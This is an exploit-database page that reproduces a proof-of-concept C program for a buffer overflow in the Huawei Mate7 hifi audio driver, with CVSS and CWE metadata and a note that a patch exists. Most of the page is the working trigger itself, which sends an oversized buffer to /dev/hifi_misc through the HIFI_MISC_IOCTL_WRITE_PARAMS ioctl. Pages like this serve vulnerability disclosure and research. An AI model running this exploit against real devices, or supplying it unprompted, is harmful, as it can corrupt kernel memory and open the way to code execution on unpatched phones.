HuaWei Mate7 hifi driver Poc

vendor:

Mate7 hifi driver

by:

pray3r

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Mate7 hifi driver

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

HuaWei Mate7 hifi driver Poc

This exploit is a proof-of-concept (POC) for a buffer overflow vulnerability in the HuaWei Mate7 hifi driver. The vulnerability is triggered when the ioctl HIFI_MISC_IOCTL_WRITE_PARAMS is called with a large input buffer, which can lead to a buffer overflow. This can be exploited to execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

/*
 *
 *  HuaWei Mate7 hifi driver Poc
 *
 *  Writen by pray3r, <pray3r.z@gmail.com>
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>

#define HIFI_MISC_IOCTL_WRITE_PARAMS    _IOWR('A', 0x75, struct misc_io_sync_param)

struct misc_io_sync_param {
	void *                  para_in;           
	unsigned int            para_size_in;       
	void *                  para_out;           
	unsigned int            para_size_out;   
};

int main(int arg, char **argv)
{
	int fd; 
	void *in = malloc(300 * 1024);
	void *out = malloc(100);
	struct misc_io_sync_param poc;

	poc.para_in = in;
	poc.para_size_in = 300 * 1024;
	poc.para_out = out;
	poc.para_size_out = 100;

	fd = open("/dev/hifi_misc", O_RDWR);

	ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);

	free(in);
	free(out);

	return 0;
}